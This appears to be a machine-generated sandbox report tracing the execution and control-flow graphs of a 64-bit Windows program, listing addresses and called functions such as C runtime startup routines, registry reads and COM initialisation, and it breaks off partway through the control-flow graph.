                                                                                                                                                                          execution_graph 14683 7ff6a22fdda4 14706 7ff6a22fda90 14683->14706 14686 7ff6a22fdef0 14736 7ff6a22fe6d0 IsProcessorFeaturePresent 14686->14736 14687 7ff6a22fddc0 __scrt_acquire_startup_lock 14689 7ff6a22fdefa 14687->14689 14694 7ff6a22fddde __scrt_release_startup_lock 14687->14694 14690 7ff6a22fe6d0 7 API calls 14689->14690 14691 7ff6a22fdf05 __std_fs_directory_iterator_open 14690->14691 14692 7ff6a22fde03 14693 7ff6a22fde89 14714 7ff6a22fe818 14693->14714 14694->14692 14694->14693 14725 7ff6a2306d28 14694->14725 14696 7ff6a22fde8e 14717 7ff6a2307990 14696->14717 14707 7ff6a22fda98 14706->14707 14708 7ff6a22fdaa4 __scrt_dllmain_crt_thread_attach 14707->14708 14709 7ff6a22fdab1 14708->14709 14710 7ff6a22fdaad 14708->14710 14743 7ff6a23078a8 14709->14743 14710->14686 14710->14687 14839 7ff6a2317230 14714->14839 14841 7ff6a231084c 14717->14841 14719 7ff6a22fde96 14722 7ff6a22f6e30 14719->14722 14720 7ff6a230799f 14720->14719 14847 7ff6a2310bfc 14720->14847 15217 7ff6a22f6c40 14722->15217 14726 7ff6a2306d60 14725->14726 14727 7ff6a2306d3f 14725->14727 15608 7ff6a23068b0 14726->15608 14727->14693 14737 7ff6a22fe6f6 _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 14736->14737 14738 7ff6a22fe715 RtlCaptureContext RtlLookupFunctionEntry 14737->14738 14739 7ff6a22fe73e RtlVirtualUnwind 14738->14739 14740 7ff6a22fe77a __scrt_get_show_window_mode 14738->14740 14739->14740 14741 7ff6a22fe7ac IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14740->14741 14742 7ff6a22fe7fa _invalid_parameter_noinfo_noreturn 14741->14742 14742->14689 14744 7ff6a2310e08 14743->14744 14745 7ff6a22fdab6 14744->14745 14753 7ff6a230a410 14744->14753 14745->14710 14747 7ff6a22ffcb0 14745->14747 14748 7ff6a22ffcc2 14747->14748 14749 7ff6a22ffcb8 14747->14749 14748->14710 14818 7ff6a22ffe88 14749->14818 14754 7ff6a230a420 14753->14754 14756 7ff6a230a42b __vcrt_uninitialize_ptd 14754->14756 14757 7ff6a230a288 GetLastError 14754->14757 14756->14744 14758 7ff6a230a2c9 FlsSetValue 14757->14758 14762 7ff6a230a2ac 14757->14762 14759 7ff6a230a2db 14758->14759 14771 7ff6a230a2b9 SetLastError 14758->14771 14774 7ff6a230ae30 14759->14774 14762->14758 14762->14771 14764 7ff6a230a308 FlsSetValue 14767 7ff6a230a326 14764->14767 14768 7ff6a230a314 FlsSetValue 14764->14768 14765 7ff6a230a2f8 FlsSetValue 14766 7ff6a230a301 14765->14766 14781 7ff6a2309d5c 14766->14781 14787 7ff6a2309ec0 14767->14787 14768->14766 14771->14756 14779 7ff6a230ae41 _Wcrtomb 14774->14779 14775 7ff6a230ae92 14795 7ff6a2303a84 14775->14795 14776 7ff6a230ae76 HeapAlloc 14778 7ff6a230a2ea 14776->14778 14776->14779 14778->14764 14778->14765 14779->14775 14779->14776 14792 7ff6a2306838 14779->14792 14782 7ff6a2309d61 HeapFree 14781->14782 14784 7ff6a2309d92 14781->14784 14783 7ff6a2309d7c GetLastError 14782->14783 14782->14784 14785 7ff6a2309d89 Concurrency::details::SchedulerProxy::DeleteThis 14783->14785 14784->14771 14786 7ff6a2303a84 _Wcrtomb 9 API calls 14785->14786 14786->14784 14804 7ff6a2309d98 14787->14804 14798 7ff6a2306878 14792->14798 14796 7ff6a230a288 _Wcrtomb 11 API calls 14795->14796 14797 7ff6a2303a8d 14796->14797 14797->14778 14803 7ff6a2303aec EnterCriticalSection 14798->14803 14816 7ff6a2303aec EnterCriticalSection 14804->14816 14819 7ff6a22ffe97 14818->14819 14821 7ff6a22ffcbd 14818->14821 14826 7ff6a23032a4 14819->14826 14822 7ff6a23030d4 14821->14822 14823 7ff6a23030ff 14822->14823 14824 7ff6a2303103 14823->14824 14825 7ff6a23030e2 DeleteCriticalSection 14823->14825 14824->14748 14825->14823 14830 7ff6a230310c 14826->14830 14831 7ff6a23031f6 TlsFree 14830->14831 14836 7ff6a2303150 __vcrt_InitializeCriticalSectionEx 14830->14836 14832 7ff6a230317e LoadLibraryExW 14834 7ff6a230319f GetLastError 14832->14834 14835 7ff6a230321d 14832->14835 14833 7ff6a230323d GetProcAddress 14833->14831 14834->14836 14835->14833 14837 7ff6a2303234 FreeLibrary 14835->14837 14836->14831 14836->14832 14836->14833 14838 7ff6a23031c1 LoadLibraryExW 14836->14838 14837->14833 14838->14835 14838->14836 14840 7ff6a22fe82f GetStartupInfoW 14839->14840 14840->14696 14842 7ff6a2310859 14841->14842 14843 7ff6a231089e 14841->14843 14851 7ff6a230a1e4 14842->14851 14843->14720 14848 7ff6a2310b88 14847->14848 14849 7ff6a230628c TranslateName 47 API calls 14848->14849 14850 7ff6a2310bac 14849->14850 14850->14720 14852 7ff6a230a210 FlsSetValue 14851->14852 14853 7ff6a230a1f5 FlsGetValue 14851->14853 14855 7ff6a230a202 14852->14855 14856 7ff6a230a21d 14852->14856 14854 7ff6a230a20a 14853->14854 14853->14855 14854->14852 14859 7ff6a230a208 14855->14859 14894 7ff6a2306178 14855->14894 14858 7ff6a230ae30 _Wcrtomb 11 API calls 14856->14858 14861 7ff6a230a22c 14858->14861 14871 7ff6a2310524 14859->14871 14862 7ff6a230a24a FlsSetValue 14861->14862 14863 7ff6a230a23a FlsSetValue 14861->14863 14864 7ff6a230a256 FlsSetValue 14862->14864 14865 7ff6a230a268 14862->14865 14866 7ff6a230a243 14863->14866 14864->14866 14868 7ff6a2309ec0 _Wcrtomb 11 API calls 14865->14868 14867 7ff6a2309d5c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14866->14867 14867->14855 14869 7ff6a230a270 14868->14869 14870 7ff6a2309d5c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14869->14870 14870->14859 15042 7ff6a2310794 14871->15042 14873 7ff6a2310559 15057 7ff6a2310224 14873->15057 14876 7ff6a2310576 14876->14843 14879 7ff6a231058f 14880 7ff6a2309d5c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14879->14880 14880->14876 14881 7ff6a231059e 14881->14881 15071 7ff6a23108c8 14881->15071 14884 7ff6a231069a 14885 7ff6a2303a84 _Wcrtomb 11 API calls 14884->14885 14886 7ff6a231069f 14885->14886 14889 7ff6a2309d5c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14886->14889 14887 7ff6a23106f5 14888 7ff6a231075c 14887->14888 15082 7ff6a2310054 14887->15082 14892 7ff6a2309d5c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14888->14892 14889->14876 14890 7ff6a23106b4 14890->14887 14893 7ff6a2309d5c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14890->14893 14892->14876 14893->14887 14903 7ff6a230ea44 14894->14903 14937 7ff6a230e9fc 14903->14937 14942 7ff6a2303aec EnterCriticalSection 14937->14942 15043 7ff6a23107b7 15042->15043 15044 7ff6a23107c1 15043->15044 15097 7ff6a2303aec EnterCriticalSection 15043->15097 15046 7ff6a2310833 15044->15046 15049 7ff6a2306178 __std_fs_directory_iterator_open 47 API calls 15044->15049 15046->14873 15050 7ff6a231084b 15049->15050 15053 7ff6a231089e 15050->15053 15054 7ff6a230a1e4 52 API calls 15050->15054 15053->14873 15055 7ff6a2310888 15054->15055 15056 7ff6a2310524 67 API calls 15055->15056 15056->15053 15098 7ff6a230628c 15057->15098 15060 7ff6a2310256 15062 7ff6a231025b GetACP 15060->15062 15063 7ff6a231026b 15060->15063 15061 7ff6a2310244 GetOEMCP 15061->15063 15062->15063 15063->14876 15064 7ff6a230add0 15063->15064 15065 7ff6a230ae1b 15064->15065 15069 7ff6a230addf _Wcrtomb 15064->15069 15067 7ff6a2303a84 _Wcrtomb 11 API calls 15065->15067 15066 7ff6a230ae02 HeapAlloc 15068 7ff6a230ae19 15066->15068 15066->15069 15067->15068 15068->14879 15068->14881 15069->15065 15069->15066 15070 7ff6a2306838 std::_Facet_Register 2 API calls 15069->15070 15070->15069 15072 7ff6a2310224 49 API calls 15071->15072 15073 7ff6a23108f5 15072->15073 15074 7ff6a2310a4b 15073->15074 15076 7ff6a2310932 IsValidCodePage 15073->15076 15081 7ff6a231094c __scrt_get_show_window_mode 15073->15081 15075 7ff6a22fd920 codecvt 8 API calls 15074->15075 15077 7ff6a2310691 15075->15077 15076->15074 15078 7ff6a2310943 15076->15078 15077->14884 15077->14890 15079 7ff6a2310972 GetCPInfo 15078->15079 15078->15081 15079->15074 15079->15081 15130 7ff6a231033c 15081->15130 15216 7ff6a2303aec EnterCriticalSection 15082->15216 15099 7ff6a23062b0 15098->15099 15100 7ff6a23062ab 15098->15100 15099->15100 15101 7ff6a230a110 _Getctype 47 API calls 15099->15101 15100->15060 15100->15061 15102 7ff6a23062cb 15101->15102 15106 7ff6a230e924 15102->15106 15107 7ff6a230e939 15106->15107 15108 7ff6a23062ee 15106->15108 15107->15108 15114 7ff6a23126cc 15107->15114 15110 7ff6a230e990 15108->15110 15111 7ff6a230e9b8 15110->15111 15112 7ff6a230e9a5 15110->15112 15111->15100 15112->15111 15127 7ff6a23108ac 15112->15127 15115 7ff6a230a110 _Getctype 47 API calls 15114->15115 15116 7ff6a23126db 15115->15116 15117 7ff6a2312726 15116->15117 15126 7ff6a2303aec EnterCriticalSection 15116->15126 15117->15108 15128 7ff6a230a110 _Getctype 47 API calls 15127->15128 15129 7ff6a23108b5 15128->15129 15131 7ff6a2310379 GetCPInfo 15130->15131 15140 7ff6a231046f 15130->15140 15137 7ff6a231038c 15131->15137 15131->15140 15132 7ff6a22fd920 codecvt 8 API calls 15134 7ff6a231050e 15132->15134 15134->15074 15141 7ff6a230e3c8 15137->15141 15140->15132 15142 7ff6a230628c TranslateName 47 API calls 15141->15142 15143 7ff6a230e40a 15142->15143 15161 7ff6a230f290 15143->15161 15163 7ff6a230f299 MultiByteToWideChar 15161->15163 15222 7ff6a22f3990 15217->15222 15221 7ff6a22f6e11 15298 7ff6a22f9330 15222->15298 15224 7ff6a22f3a06 15225 7ff6a22f9330 49 API calls 15224->15225 15226 7ff6a22f3a2c 15225->15226 15227 7ff6a22f9330 49 API calls 15226->15227 15228 7ff6a22f3a52 15227->15228 15312 7ff6a22fd948 15228->15312 15230 7ff6a22f3a69 15232 7ff6a22f3ac0 15230->15232 15321 7ff6a22f7bd0 15230->15321 15335 7ff6a22f96b0 15232->15335 15234 7ff6a22f3f8b 15236 7ff6a22f9330 49 API calls 15234->15236 15235 7ff6a22f3b32 RegOpenKeyExW 15269 7ff6a22f3acb 15235->15269 15237 7ff6a22f3fb2 15236->15237 15241 7ff6a22f96b0 Concurrency::details::SchedulerBase::GetBitSet 50 API calls 15237->15241 15267 7ff6a22f3f89 15237->15267 15238 7ff6a22f404a 15368 7ff6a22f13c0 15238->15368 15244 7ff6a22f3fc5 15241->15244 15242 7ff6a22fd920 codecvt 8 API calls 15245 7ff6a22f400c 15242->15245 15247 7ff6a22f402d 15244->15247 15244->15267 15271 7ff6a22f4060 CoInitializeEx 15245->15271 15246 7ff6a22f8a80 49 API calls 15246->15269 15363 7ff6a2303938 15247->15363 15249 7ff6a22f4032 15252 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15249->15252 15250 7ff6a22f3c5f RegQueryValueExW 15253 7ff6a22f3eb3 RegCloseKey 15250->15253 15250->15269 15251 7ff6a22f85b0 86 API calls 15251->15269 15254 7ff6a22f4038 15252->15254 15255 7ff6a22f3ed1 15253->15255 15257 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15254->15257 15255->15255 15258 7ff6a22f9330 49 API calls 15255->15258 15256 7ff6a22f9330 49 API calls 15256->15269 15259 7ff6a22f403e 15257->15259 15260 7ff6a22f3eea 15258->15260 15262 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15259->15262 15260->15249 15261 7ff6a22f3f26 15260->15261 15264 7ff6a22f96b0 Concurrency::details::SchedulerBase::GetBitSet 50 API calls 15261->15264 15261->15267 15263 7ff6a22f4044 15262->15263 15265 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15263->15265 15266 7ff6a22f3f51 15264->15266 15265->15238 15266->15254 15266->15267 15267->15242 15268 7ff6a22f9c00 49 API calls 15268->15269 15269->15234 15269->15235 15269->15238 15269->15246 15269->15249 15269->15250 15269->15251 15269->15256 15269->15259 15269->15263 15269->15268 15270 7ff6a22f3d4e RegCloseKey 15269->15270 15351 7ff6a22f9f10 15269->15351 15270->15269 15272 7ff6a22f407a 15271->15272 15273 7ff6a22f4149 CoInitializeSecurity 15271->15273 15274 7ff6a22f9330 49 API calls 15272->15274 15275 7ff6a22f417e 15273->15275 15290 7ff6a22f413e 15273->15290 15276 7ff6a22f40a3 15274->15276 15277 7ff6a22f9330 49 API calls 15275->15277 15415 7ff6a22f8a80 15276->15415 15278 7ff6a22f41a7 15277->15278 15280 7ff6a22f8a80 49 API calls 15278->15280 15282 7ff6a22f41bb 15280->15282 15281 7ff6a22f40b7 15427 7ff6a22f85b0 15281->15427 15285 7ff6a22f85b0 86 API calls 15282->15285 15284 7ff6a22f40e9 15447 7ff6a22f9c00 15284->15447 15286 7ff6a22f41ed 15285->15286 15288 7ff6a22f9c00 49 API calls 15286->15288 15289 7ff6a22f4200 15288->15289 15291 7ff6a22f423f CoUninitialize 15289->15291 15293 7ff6a22f423a 15289->15293 15295 7ff6a22f4251 15289->15295 15290->15221 15291->15290 15292 7ff6a22f40fc 15292->15290 15294 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15292->15294 15293->15291 15297 7ff6a22f425c 15294->15297 15296 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15295->15296 15296->15292 15299 7ff6a22f9456 15298->15299 15302 7ff6a22f9356 15298->15302 15300 7ff6a22f13c0 Concurrency::details::SchedulerBase::GetBitSet 49 API calls 15299->15300 15301 7ff6a22f945c 15300->15301 15303 7ff6a22f9450 15302->15303 15304 7ff6a22f940e 15302->15304 15305 7ff6a22f93ba 15302->15305 15309 7ff6a22f9361 BuildCatchObjectHelperInternal 15302->15309 15373 7ff6a22f1320 15303->15373 15307 7ff6a22fd948 std::_Facet_Register 49 API calls 15304->15307 15305->15303 15308 7ff6a22fd948 std::_Facet_Register 49 API calls 15305->15308 15307->15309 15310 7ff6a22f93cf 15308->15310 15309->15224 15310->15309 15311 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15310->15311 15311->15303 15313 7ff6a22fd953 15312->15313 15314 7ff6a22fd96c 15313->15314 15315 7ff6a2306838 std::_Facet_Register 2 API calls 15313->15315 15317 7ff6a22fd972 15313->15317 15314->15230 15315->15313 15316 7ff6a22fd97d 15319 7ff6a22f1320 Concurrency::cancel_current_task 49 API calls 15316->15319 15317->15316 15397 7ff6a22fe694 15317->15397 15320 7ff6a22fd983 15319->15320 15325 7ff6a22f7bfe 15321->15325 15322 7ff6a22f7cf3 15323 7ff6a22f13c0 Concurrency::details::SchedulerBase::GetBitSet 49 API calls 15322->15323 15324 7ff6a22f7cf9 15323->15324 15325->15322 15326 7ff6a22f7cb4 15325->15326 15327 7ff6a22f7c8d 15325->15327 15332 7ff6a22f7c1a BuildCatchObjectHelperInternal 15325->15332 15334 7ff6a22f7ced 15325->15334 15329 7ff6a22fd948 std::_Facet_Register 49 API calls 15326->15329 15330 7ff6a22fd948 std::_Facet_Register 49 API calls 15327->15330 15327->15334 15328 7ff6a22f1320 Concurrency::cancel_current_task 49 API calls 15328->15322 15329->15332 15331 7ff6a22f7c9e 15330->15331 15331->15332 15333 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15331->15333 15332->15230 15333->15334 15334->15328 15336 7ff6a22f9723 15335->15336 15337 7ff6a22f96b5 15335->15337 15336->15269 15337->15336 15338 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15337->15338 15339 7ff6a22f9738 15338->15339 15340 7ff6a22f13c0 Concurrency::details::SchedulerBase::GetBitSet 49 API calls 15339->15340 15341 7ff6a22f98a2 15340->15341 15342 7ff6a22f13c0 Concurrency::details::SchedulerBase::GetBitSet 49 API calls 15341->15342 15343 7ff6a22f9a3d 15342->15343 15401 7ff6a22fcce8 15343->15401 15345 7ff6a22f9a88 15345->15269 15347 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15348 7ff6a22f9aa9 15347->15348 15349 7ff6a22f9b10 15348->15349 15350 7ff6a22f96b0 Concurrency::details::SchedulerBase::GetBitSet 50 API calls 15348->15350 15349->15269 15350->15349 15352 7ff6a22f9f67 15351->15352 15355 7ff6a22f9fb1 BuildCatchObjectHelperInternal 15351->15355 15353 7ff6a22fa043 15352->15353 15352->15355 15356 7ff6a22f9f93 15352->15356 15357 7ff6a22f9feb 15352->15357 15354 7ff6a22f1320 Concurrency::cancel_current_task 49 API calls 15353->15354 15358 7ff6a22fa049 15354->15358 15355->15269 15356->15353 15360 7ff6a22fd948 std::_Facet_Register 49 API calls 15356->15360 15359 7ff6a22fd948 std::_Facet_Register 49 API calls 15357->15359 15358->15269 15359->15355 15361 7ff6a22f9fa8 15360->15361 15361->15355 15362 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15361->15362 15362->15353 15364 7ff6a23037b0 _invalid_parameter_noinfo 47 API calls 15363->15364 15365 7ff6a2303951 15364->15365 15366 7ff6a2303968 _invalid_parameter_noinfo_noreturn 17 API calls 15365->15366 15367 7ff6a2303966 15366->15367 15407 7ff6a22fb28c 15368->15407 15374 7ff6a22f132e Concurrency::cancel_current_task 15373->15374 15379 7ff6a22ff9a0 15374->15379 15376 7ff6a22f133f 15384 7ff6a22ff75c 15376->15384 15378 7ff6a22f1369 15378->15299 15380 7ff6a22ff9bf 15379->15380 15381 7ff6a22ffa0a RaiseException 15380->15381 15382 7ff6a22ff9e8 RtlPcToFileHeader 15380->15382 15381->15376 15383 7ff6a22ffa00 15382->15383 15383->15381 15385 7ff6a22ff7b2 __vcrt_freefls 15384->15385 15386 7ff6a22ff77d 15384->15386 15385->15378 15386->15385 15388 7ff6a23093f4 15386->15388 15389 7ff6a230940b 15388->15389 15390 7ff6a2309401 15388->15390 15391 7ff6a2303a84 _Wcrtomb 11 API calls 15389->15391 15390->15389 15395 7ff6a2309426 15390->15395 15392 7ff6a2309412 15391->15392 15394 7ff6a2303918 _invalid_parameter_noinfo 47 API calls 15392->15394 15393 7ff6a230941e 15393->15385 15394->15393 15395->15393 15396 7ff6a2303a84 _Wcrtomb 11 API calls 15395->15396 15396->15392 15398 7ff6a22fe6a2 std::bad_alloc::bad_alloc 15397->15398 15399 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15398->15399 15400 7ff6a22fe6b3 15399->15400 15402 7ff6a22fccf2 FindClose 15401->15402 15403 7ff6a22f9a52 15401->15403 15402->15403 15404 7ff6a22fcd01 15402->15404 15403->15345 15403->15347 15405 7ff6a2306178 __std_fs_directory_iterator_open 47 API calls 15404->15405 15406 7ff6a22fcd06 15405->15406 15412 7ff6a22fb13c 15407->15412 15410 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15411 7ff6a22fb2ae 15410->15411 15413 7ff6a22ff75c __std_exception_copy 47 API calls 15412->15413 15414 7ff6a22fb170 15413->15414 15414->15410 15416 7ff6a22f8ab0 15415->15416 15417 7ff6a22f9c00 49 API calls 15416->15417 15422 7ff6a22f8aff 15416->15422 15417->15422 15418 7ff6a22f8cbf 15418->15281 15419 7ff6a22f8cae 15419->15418 15471 7ff6a22fa0a0 15419->15471 15420 7ff6a22f8cec 15500 7ff6a22f2400 15420->15500 15422->15419 15422->15420 15428 7ff6a22f85f1 15427->15428 15515 7ff6a22fb034 15428->15515 15430 7ff6a22f85fe 15431 7ff6a22fb034 std::_Lockit::_Lockit 6 API calls 15430->15431 15436 7ff6a22f864d 15430->15436 15432 7ff6a22f8623 15431->15432 15519 7ff6a22fb0ac 15432->15519 15433 7ff6a22f8697 15434 7ff6a22fb0ac std::_Lockit::~_Lockit LeaveCriticalSection 15433->15434 15441 7ff6a22f86e1 15434->15441 15436->15433 15523 7ff6a22f1de0 15436->15523 15439 7ff6a22f86b5 15545 7ff6a22fb454 15439->15545 15440 7ff6a22f8737 15548 7ff6a22f1bd0 15440->15548 15444 7ff6a22fd920 codecvt 8 API calls 15441->15444 15446 7ff6a22f871d 15444->15446 15446->15284 15448 7ff6a22f9cc0 15447->15448 15449 7ff6a22f9c3e 15447->15449 15451 7ff6a22fd920 codecvt 8 API calls 15448->15451 15604 7ff6a22f9b60 15449->15604 15453 7ff6a22f9cee 15451->15453 15453->15292 15454 7ff6a22f9cad 15454->15448 15455 7ff6a22fa0a0 49 API calls 15454->15455 15455->15448 15456 7ff6a22f9d03 15457 7ff6a22f2400 49 API calls 15456->15457 15458 7ff6a22f9d45 15457->15458 15459 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15458->15459 15460 7ff6a22f9d56 15459->15460 15461 7ff6a22f9da6 15460->15461 15462 7ff6a22f9c00 49 API calls 15460->15462 15463 7ff6a22f9eb4 15461->15463 15465 7ff6a22f9e7f 15461->15465 15462->15461 15467 7ff6a22f2400 49 API calls 15463->15467 15464 7ff6a22f9e90 15464->15292 15465->15464 15466 7ff6a22fa0a0 49 API calls 15465->15466 15466->15464 15468 7ff6a22f9ef6 15467->15468 15469 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15468->15469 15470 7ff6a22f9f07 15469->15470 15472 7ff6a22fa0e9 15471->15472 15473 7ff6a22fa0b7 15471->15473 15472->15418 15473->15472 15474 7ff6a22f2400 49 API calls 15473->15474 15475 7ff6a22fa12f 15474->15475 15476 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15475->15476 15479 7ff6a22fa140 15476->15479 15477 7ff6a22fa28f 15478 7ff6a22f13c0 Concurrency::details::SchedulerBase::GetBitSet 49 API calls 15477->15478 15489 7ff6a22fa295 15478->15489 15479->15477 15480 7ff6a22fa289 15479->15480 15481 7ff6a22fa1f3 15479->15481 15482 7ff6a22fa247 15479->15482 15484 7ff6a22fa17f BuildCatchObjectHelperInternal 15479->15484 15483 7ff6a22f1320 Concurrency::cancel_current_task 49 API calls 15480->15483 15481->15480 15486 7ff6a22fd948 std::_Facet_Register 49 API calls 15481->15486 15485 7ff6a22fd948 std::_Facet_Register 49 API calls 15482->15485 15483->15477 15484->15418 15485->15484 15488 7ff6a22fa208 15486->15488 15487 7ff6a22fa316 15492 7ff6a22fa502 15487->15492 15493 7ff6a22fa4ba 15487->15493 15488->15484 15490 7ff6a2303938 _invalid_parameter_noinfo_noreturn 47 API calls 15488->15490 15489->15487 15491 7ff6a22f9c00 49 API calls 15489->15491 15490->15480 15491->15487 15496 7ff6a22f2400 49 API calls 15492->15496 15494 7ff6a22fa4cb 15493->15494 15495 7ff6a22fa0a0 49 API calls 15493->15495 15494->15418 15495->15494 15497 7ff6a22fa546 15496->15497 15498 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15497->15498 15499 7ff6a22fa557 15498->15499 15501 7ff6a22f2430 15500->15501 15501->15501 15511 7ff6a22f95b0 15501->15511 15512 7ff6a22f96a5 15511->15512 15513 7ff6a22f13c0 Concurrency::details::SchedulerBase::GetBitSet 49 API calls 15512->15513 15514 7ff6a22f96aa 15513->15514 15516 7ff6a22fb043 15515->15516 15518 7ff6a22fb048 15515->15518 15554 7ff6a2303b5c 15516->15554 15518->15430 15520 7ff6a22fb0c0 15519->15520 15521 7ff6a22fb0b7 LeaveCriticalSection 15519->15521 15520->15436 15524 7ff6a22f1e0c 15523->15524 15544 7ff6a22f1f68 15523->15544 15525 7ff6a22fd948 std::_Facet_Register 49 API calls 15524->15525 15524->15544 15526 7ff6a22f1e1f 15525->15526 15527 7ff6a22fb034 std::_Lockit::_Lockit 6 API calls 15526->15527 15528 7ff6a22f1e50 15527->15528 15529 7ff6a22f1e8c 15528->15529 15530 7ff6a22f1f86 15528->15530 15578 7ff6a22fb604 15529->15578 15583 7ff6a22fb2d4 15530->15583 15544->15439 15544->15440 15546 7ff6a22fd948 std::_Facet_Register 49 API calls 15545->15546 15547 7ff6a22fb467 15546->15547 15547->15433 15549 7ff6a22f1bde Concurrency::cancel_current_task 15548->15549 15550 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15549->15550 15551 7ff6a22f1bef 15550->15551 15552 7ff6a22ff75c __std_exception_copy 47 API calls 15551->15552 15553 7ff6a22f1c19 15552->15553 15557 7ff6a230ac0c 15554->15557 15558 7ff6a230a524 __crtLCMapStringW 5 API calls 15557->15558 15559 7ff6a230ac2c 15558->15559 15560 7ff6a230a524 __crtLCMapStringW 5 API calls 15559->15560 15561 7ff6a230ac4b 15560->15561 15562 7ff6a230a524 __crtLCMapStringW 5 API calls 15561->15562 15563 7ff6a230ac6a 15562->15563 15564 7ff6a230a524 __crtLCMapStringW 5 API calls 15563->15564 15565 7ff6a230ac89 15564->15565 15566 7ff6a230a524 __crtLCMapStringW 5 API calls 15565->15566 15567 7ff6a230aca8 15566->15567 15568 7ff6a230a524 __crtLCMapStringW 5 API calls 15567->15568 15569 7ff6a230acc7 15568->15569 15570 7ff6a230a524 __crtLCMapStringW 5 API calls 15569->15570 15571 7ff6a230ace6 15570->15571 15572 7ff6a230a524 __crtLCMapStringW 5 API calls 15571->15572 15573 7ff6a230ad05 15572->15573 15574 7ff6a230a524 __crtLCMapStringW 5 API calls 15573->15574 15575 7ff6a230ad24 15574->15575 15576 7ff6a230a524 __crtLCMapStringW 5 API calls 15575->15576 15577 7ff6a230ad43 15576->15577 15588 7ff6a2303e6c 15578->15588 15601 7ff6a22fb244 15583->15601 15586 7ff6a22ff9a0 Concurrency::cancel_current_task 2 API calls 15587 7ff6a22fb2f6 15586->15587 15589 7ff6a230ac0c std::_Lockit::_Lockit 5 API calls 15588->15589 15590 7ff6a2303e82 15589->15590 15593 7ff6a2303b90 15590->15593 15600 7ff6a2303aec EnterCriticalSection 15593->15600 15602 7ff6a22ff75c __std_exception_copy 47 API calls 15601->15602 15603 7ff6a22fb278 15602->15603 15603->15586 15606 7ff6a22f9b89 15604->15606 15605 7ff6a22f9b9e 15605->15454 15605->15456 15606->15605 15607 7ff6a22f9c00 49 API calls 15606->15607 15607->15605 15609 7ff6a230a110 _Getctype 47 API calls 15608->15609 15610 7ff6a23068b9 15609->15610 15611 7ff6a2306178 __std_fs_directory_iterator_open 47 API calls 15610->15611 15612 7ff6a23068d9 15611->15612

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 7ff6a22f3990-7ff6a22f3a9c call 7ff6a22f9330 * 3 call 7ff6a22fd948 9 7ff6a22f3aa0-7ff6a22f3abe call 7ff6a22f7bd0 0->9 12 7ff6a22f3ac0-7ff6a22f3b0d call 7ff6a22f96b0 call 7ff6a22fd984 9->12 17 7ff6a22f3b14-7ff6a22f3b1f 12->17 18 7ff6a22f3b25-7ff6a22f3b2d 17->18 19 7ff6a22f3e99-7ff6a22f3ea4 17->19 22 7ff6a22f3b32-7ff6a22f3b53 RegOpenKeyExW 18->22 23 7ff6a22f3b2f 18->23 20 7ff6a22f3eaa-7ff6a22f3eae 19->20 21 7ff6a22f3f8b-7ff6a22f3fba call 7ff6a22f9330 19->21 20->17 34 7ff6a22f3fbc-7ff6a22f3fde call 7ff6a22f96b0 21->34 35 7ff6a22f3ffa-7ff6a22f402c call 7ff6a22fd920 21->35 25 7ff6a22f3da1-7ff6a22f3dab 22->25 26 7ff6a22f3b59-7ff6a22f3b68 22->26 23->22 30 7ff6a22f3db1-7ff6a22f3db9 25->30 31 7ff6a22f404b-7ff6a22f4050 call 7ff6a22f13c0 25->31 27 7ff6a22f3b6d-7ff6a22f3b73 26->27 28 7ff6a22f3b6a 26->28 32 7ff6a22f3c02 27->32 33 7ff6a22f3b79-7ff6a22f3b88 27->33 28->27 36 7ff6a22f3dbe-7ff6a22f3e49 call 7ff6a22f9f10 call 7ff6a22f8a80 call 7ff6a22fa2a0 call 7ff6a22f85b0 call 7ff6a22f9d60 call 7ff6a22f9c00 30->36 37 7ff6a22f3dbb 30->37 43 7ff6a22f3c05-7ff6a22f3c2d 32->43 40 7ff6a22f3b90-7ff6a22f3b9c 33->40 55 7ff6a22f3ff5 call 7ff6a22fd940 34->55 56 7ff6a22f3fe0-7ff6a22f3ff3 34->56 101 7ff6a22f3e82-7ff6a22f3e93 36->101 102 7ff6a22f3e4b-7ff6a22f3e62 36->102 37->36 47 7ff6a22f3b9e-7ff6a22f3ba2 40->47 48 7ff6a22f3bba-7ff6a22f3bc0 40->48 45 7ff6a22f3c30-7ff6a22f3c39 43->45 45->45 51 7ff6a22f3c3b-7ff6a22f3c4a call 7ff6a22f9330 45->51 53 7ff6a22f3ba4-7ff6a22f3ba8 47->53 54 7ff6a22f3bb7 47->54 48->32 57 7ff6a22f3bc2-7ff6a22f3bd8 48->57 70 7ff6a22f3c51-7ff6a22f3c5a 51->70 71 7ff6a22f3c4c-7ff6a22f3c4f 51->71 53->48 60 7ff6a22f3baa-7ff6a22f3bb5 53->60 54->48 55->35 56->55 61 7ff6a22f402d-7ff6a22f4032 call 7ff6a2303938 56->61 63 7ff6a22f3be0-7ff6a22f3be8 57->63 60->53 60->54 74 7ff6a22f4033-7ff6a22f4038 call 7ff6a2303938 61->74 66 7ff6a22f3bfc-7ff6a22f3c00 63->66 67 